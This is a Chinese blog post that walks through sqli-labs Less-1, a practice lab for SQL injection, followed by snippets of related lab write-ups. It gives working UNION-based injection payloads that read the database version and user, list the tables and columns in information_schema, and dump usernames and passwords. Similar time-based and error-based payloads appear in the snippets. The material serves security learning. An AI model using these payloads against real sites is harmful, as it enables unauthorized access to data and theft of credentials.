sqli-labs/less-1:基于错误提示的sql注入

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量989 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44236278/article/details/97925373
版权

根据大佬的文章做的sql注入
在这里插入图片描述打开less-1得到以上界面,页面提示:输入数字范围内的id
首先构造URL,?id=1会得到以下界面
在这里插入图片描述然后依次向下试验,发现到id=13时没有出现任何信息
在这里插入图片描述当输入id=1’ order by 1,‘1时,页面与输入id=1一样,但是并未出现语法错误,原因是sql语句会变成id=‘1’ order by 1,‘1’。所以依次试下去会发现order by 2和3都是能显示信息的,而id=1’ order by 4,‘1又出现了新的信息
在这里插入图片描述说明这张表只有三个字段,利用union select:构造id=1’ union select 1,2,3 order by 1,‘1
在这里插入图片描述出现了新的用户和密码。但是需要查看数据库名以及MySQL版本的时候,必须设置成id=13,这是由于网页只能显示表的第一行,要想出现新的信息,就得把之前的信息覆盖掉,利用到id=13无信息的特点可以出现新的信息。
在这里插入图片描述以下是拼接函数的利用:
构造?id=13’ union select 1,2,concat_ws(’:’,database(),version(),user()) order by 1,‘1
在这里插入图片描述构造URL查询表的信息:13’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ order by 1,‘1
在这里插入图片描述只有四张表存在,然后可以查询users的字段
构造id=13’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’ order by 1,‘1
在这里插入图片描述只有两个字段username和password
可以把所有的字段都列出来
构造id=13’ union select 1,2,group_concat(concat_ws(’:’,id,username,password)) from users order by 1,'1
在这里插入图片描述以上完成注入。

paintShadow
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全之sql注入-less1
koala_king的博客
08-17 1389
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
最新发布
m0_73615178的博客
03-03 682
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
sql libs报错注入
weixin_51387754的博客
10-24 521
SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
sqli-labs/Less-1注入
weixin_50339082的博客
06-20 79
sqli-labs/Less-1注入 Sali-lsbs第一关 1、先判断是字符型还是数字型。 127.0.0.1/sqli-labs/Less-1/?id=1 127.0.0.1/sqli-labs/Less-1/?id=1 and 1=2 说明是字符型。 2、确认字段位数 127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+ 127.0.0.1/sqli-labs/Less-1/?id=3’ order by 4--+ 一共3位。 3、判断信息输
sql注入系列Sqli-labs(less-1)
BetsyMyGirl的博客
11-30 2233
判断注入点 http://192.168.81.210/sqli/Less-1/?id=1’输入单引号出现报错,从报错语句中可以猜测后端代码为 select user from users where id='1' limit 0,1 当输入了一个单引号语句就变成了 select user from users where id='1'' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1923
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5490
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
sql注入sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 592
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1307
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1713
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sql-labs-less1 基于显错的union注入全过程
Mysmycbx的博客
07-03 640
sql-labs-less1 step0 准备 http://localhost/sqli-labs/Less-1/ HackBar MySQL Apache step1 测试 首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”; payload: http://localhost/sqli-labs/Less-1/?id=1 --+ mysql: SELECT * FROM users WHER
less-1:
yuchunhui的博客
01-23 231
1、通过 http://127.0.0.1/sqli/Less-1/?id=1' 报错 说明存在注入 2、通过http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- +判断闭合字符 为 ‘ 3.使用http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- + 二分法来判断列数 4.判断显示位 5.通过命令http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 unio
less-1
shawdow_bug的博客
07-22 314
打开页面后,根据提示,要在URL后面添加参数id,输入:/?id=1 (1)输入:/?id=1 and 1=1,页面没有变化,"and 1=1"有可能被当作SQL语句的一部分执行,也有可能只是作为字符串’1 and 1=1’的一部分。可以在数据库中测试一下: "="右边的字符串会进行数据类型的转换,转换成字符串开头的数字 1,如果不以数字开头,则转换成 0: (2)输入:/?id=1 and 1=2,页面仍然没有变化,说明1后面的子字符串确实作为字符串的一部分。 (3)输入:/?id=1’,页面出现
SQL注入Sqli-labs-Less1-4 》
weixin_47118413的博客
04-17 2761
讲解分析sqli-labs第1—4关解题思路和流程。首先判断这四关是什么交互方式(GET/POST),在判断是什么类型的注入,之后找到闭合方式,在进行数据库爆破。
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2249
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
Sqli-labs Less-1 报错注入
04-14 412
Sqli-labs Less-1 报错注入 1、首先打开less1后是一个页面,提示输入id作为参数。输入id=1试一下。 然后会出现,name 和 password,添加一个单引号 ' 测试一下注入点。 输入单引号发现,会直接将报错结果显示在页面中这里就可以尝试报错注入,将用户、数据库名称都爆破出来。 这里我们使用updatexml函数获取user()值。下图可以看到报错注入确实有效,我们看到用户为root,接下来爆数据库的名字。 0x7e是 '~' 的ASCII编码。 /sq.
Less-1(sql注入)
qq_44598397的博客
03-13 384
Less-1 源码: 1、输入: http://127.0.0.1/sqlilabs/Less-1/?id=1’ 经过URL编码过后格式变为(http://127.0.0.1/sqlilabs/Less-1/?id=1') (页面出现错误的原因是因为多了一个’号而源代码变成多了一个分号提前截止) 2、后面输入or 1=1 --+后面把’后的注释掉(–+表注释 (–空格)在SQL内表示注释,但在...
SQL注入——Less-1
一凡凡凡人的博客
09-14 1911
                 声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!!   打开主页进入第一关,提示输入参数id及它的值, 传入参数id=1后,我们会发现这个页面会根据传入的id查询到对应的用户及用户密码 我们可以通过查看数据库进行验证 这样我们就可以推断出PHP执行的SQL语句的功能是从数据库中查询出的信息为我们传入的id为1的...
less-1 字符型注入
weixin_52348955的博客
10-30 3193
url编码:空格为20%,'为27%,#为23% 字符型注入的原理和判断方法在最下面的附录里: 第一步: ?id=999999999' union select 1,2,database()# id设置为很大的原因:如果设置id为1,那么mysql确实查出了两条结果(即id=1查询到的结果和database查询到的结果),但是PHP代码决定了该页面只显示一行记录,所有让id等于一个很大的值或者-1,使得id查询不到结果,就只会显示第二条查询语句的结果 database()前面加了1,2,的原因请看附录 h
sqli-labs/Less-28
01-09
sqli-labs是一个用于学习和实践SQL注入的实验平台。Less-28是其中的一个实验,它是基于GET请求的盲注注入漏洞。在这个实验中,我们需要利用字符串单引号和括号来进行注入。 具体步骤如下: 1. 打开sqli-labs实验...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值